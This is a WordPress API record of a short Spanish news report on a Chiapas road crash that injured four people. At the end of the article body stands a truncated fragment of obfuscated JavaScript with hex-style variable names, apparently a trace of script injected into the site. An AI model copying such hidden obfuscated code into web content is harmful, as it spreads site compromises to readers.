{"id":20720,"date":"2025-03-04T05:54:53","date_gmt":"2025-03-04T05:54:53","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20720"},"modified":"2025-03-04T05:54:53","modified_gmt":"2025-03-04T05:54:53","slug":"choque-entre-particular-y-colectivo-foraneo-deja-cuatro-heridos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20720","title":{"rendered":"Choque entre particular y colectivo for\u00e1neo deja cuatro heridos"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250303-WA0018-1024x768.jpg\" alt=\"\" class=\"wp-image-20721\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250303-WA0018-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250303-WA0018-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250303-WA0018-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250303-WA0018-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250303-WA0018.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 3 de marzo del 2025.- Un choque entre un colectivo for\u00e1neo de la ruta Tuxtla-Chiapa de Corzo y una unidad particular a la altura de la 14 Oriente y 2 Norte dej\u00f3 un saldo de cuatro personas heridas.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando el conductor de un VW Pointer de color negro el cual se desplazaba de Sur a Norte y al llegar al paso no respet\u00f3 la preferencia y choc\u00f3 contra la unidad de transporte p\u00fablico.<\/p>\n\n\n\n<p>Por el golpe 4 personas resultaron heridas las cuales fueron atendidas por param\u00e9dicos de Bomberos.<\/p>\n\n\n\n<p>Al lugar arribaron elementos de tr\u00e1nsito y atestiguaron un acuerdo armonioso entre los involucrados y se retiraron del lugar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 3 de marzo del 2025.- Un choque entre un colectivo for\u00e1neo de la ruta Tuxtla-Chiapa de Corzo y una unidad particular a la altura de la 14 Oriente y 2 Norte dej\u00f3 un saldo de cuatro personas heridas. Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando el conductor de un &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20721,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-20720","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20720","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20720"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20720\/revisions"}],"predecessor-version":[{"id":20722,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20720\/revisions\/20722"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20721"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20720"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20720"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20720"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}